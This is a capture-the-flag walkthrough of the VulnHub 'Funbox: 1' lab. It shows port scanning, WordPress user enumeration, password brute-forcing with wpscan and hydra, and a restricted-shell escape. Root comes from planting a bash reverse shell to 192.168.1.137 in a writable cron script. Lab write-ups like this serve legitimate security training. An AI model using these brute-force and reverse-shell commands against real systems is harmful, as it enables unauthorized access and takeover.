Funbox1-005

Funbox 1 walkthrough

Hello hackers. Today we are talking about another VulnHub machine – “Funbox: 1”, made by twitter@0815R2d2. It’s presented as Boot2Root and you will be able to solve it for 20 minutes. I’m not really sure about the time but let’s try it out.

Funbox1-001
https://www.vulnhub.com/entry/funbox-1,518/

To be honest I could not root this machine for 20 minutes. I had spent about 1,5 hours before I reached the aim. It involved enumeration, bruteforcing, bypassing bash restrictions and reverse shell. Let’s begin our pentest.

Ok, we downloaded and installed the Funbox. Than, using netdiscover, we recognized it’s IP-address:

Funbox1-002
sudo netdiscover

Our victim is 192.168.1.102. Firstly, we should scan the machine. Some of penetration testers use ZenMap as it has GUI interface. But I prefer the speed instead of good-looking suit.

Funbox1-003
nmap -sS -sC -sV -p- 192.168.1.102

As we can see Funbox has 4 open ports: ports 21 and 22 for FTP and SSH protocols respectively, port 80 for the Web and port 33060 for the MySQL. I suggest starting from HTTP.

If you look at the NMap’s dump closer you will see several interesting things: 1. disallowed directory such as /secret/ and; 2. redirect to http://funbox.fritx.box/

The next we have to do is change /etc/hosts by adding there our new host:

Funbox1-004
sudo nano /etc/hosts

After all of those preparations we are ready to open Firefox and start browsing.

Funbox1-005
http://funbox.fritz.box/

What we have here? WordPress 5.4.2 on the Apache 2.4.41. Quite new versions to be vulnerable.

Let’s check the “secret” directory which we found earlier…

Funbox1-006
http://funbox.fritz.box/secret/

Ahhah, Try harder 😉 The reference to the OSCP course! Ok. But what’s next?

Let’s look closer to the WordPress and try to enumerate it. I usually do the next 3 stuff: enum vulnerable plugins, enum vulnerable themes and enum users.

Unfortunately, there were not any compromised themes or plugins. But we were able to find 2 users from the CMS: admin and Joe.

Funbox1-007
wpscan --url http://funbox.fritz.box/ -e u

We have users’s names and now we have to find passwords for them. Let’s try to bruteforce. It’s a CTF, so the right password should be either on the Web-page or in the rockyou.txt file. The first one doesn’t work (I tried it out using cewl), so we will use rockyou.txt.

Funbox1-008
wpscan --url http://funbox.fritz.box/ --passwords /root/Desktop/rockyou.txt --usernames joe

Wow, it’s definitely incredible. We’ve found the password for joe – 12345. Ok, good one. Let’s try the same method for admin.

Funbox1-009
wpscan --url http://funbox.fritz.box/ --passwords /root/Desktop/rockyou.txt --usernames admin

Is it for real? 🙂 So simple? Ok. Now we can log in as admin to the WordPress, change some source code and get a reverse shell as www-data. But do we really need the www-data access? As you may remember, we have FTP and SSH open ports so let’s try to get access using those protocols. For this purpose we should create a file and put there in our logins and passwords.

Funbox1-010
hydra -C users.txt ssh://192.168.1.102
hydra -C users.txt ftp://192.168.1.102

Interesting. Before we connect via SSH, let’s check what kind of information is on the FTP.

Funbox1-011
ftp 192.168.1.102

…and let’s read the mbox:

Funbox1-012
cat mbox

As we can see here are 2 emails. One of them if useless, but the first one is a hint – BackUp script. We will keep it in mind.

Now let’s connect by SSH:

Funbox1-013
ssh joe@192.168.1.102; password: 12345

And we are in. Let’s look around.

Funbox1-014
id; uname –a; sudo –l; pwd; ls

Let’s go further.

Funbox1-015
cd ..; export | grep -i "shell"

Ok, tricky move sysadmin, tricky move 😉 Let’s see if you prohibited us to launch another shell.

Funbox1-016
bash

Easy-peasy, lemon squeezy 🙂

Ok, where were we? Almost forgotten about bash history. Let’s check it.

Funbox1-017
cat /home/joe/.bash_history

I think we’ve found backup script. According to the history, Joe may change the file. Let’s check it.

Funbox1-018
ls –l /home/funny/.backup.sh

Interesting. The owner of the file is Funny, and it’s executing from the Funny, but anyone can change it…

Funbox1-019
ls –al /home/funny; cat .reminder.sh

Interesting letter. Looks like .backup.sh is in the cron. Let’s try pspy64 to check our theory. I downloaded and put into /tmp pspy64. Now it’s time to launch it.

Funbox1-020
bash /tmp/pspy64

As you can see /home/funny/.backup.sh is running under UID=1000 (Funny) and UID=0 (root). So, let’s change the file and will wait for the incoming connection 🙂

First, let’s start listening…

Funbox1-021
nc –nlvp 2020

and add one little string.

Funbox1-022
bash -i >& /dev/tcp/192.168.1.137/2020 0>&1

Now it’s time to have a rest and just waiting…

Funbox1-023
nc –nlvp 2020

The first 2 attempts succeeded and we got only user. But the last one was under the root. We did it.

To conclude it is a good middle machine where you can improve your pentesting skills .

See you soon.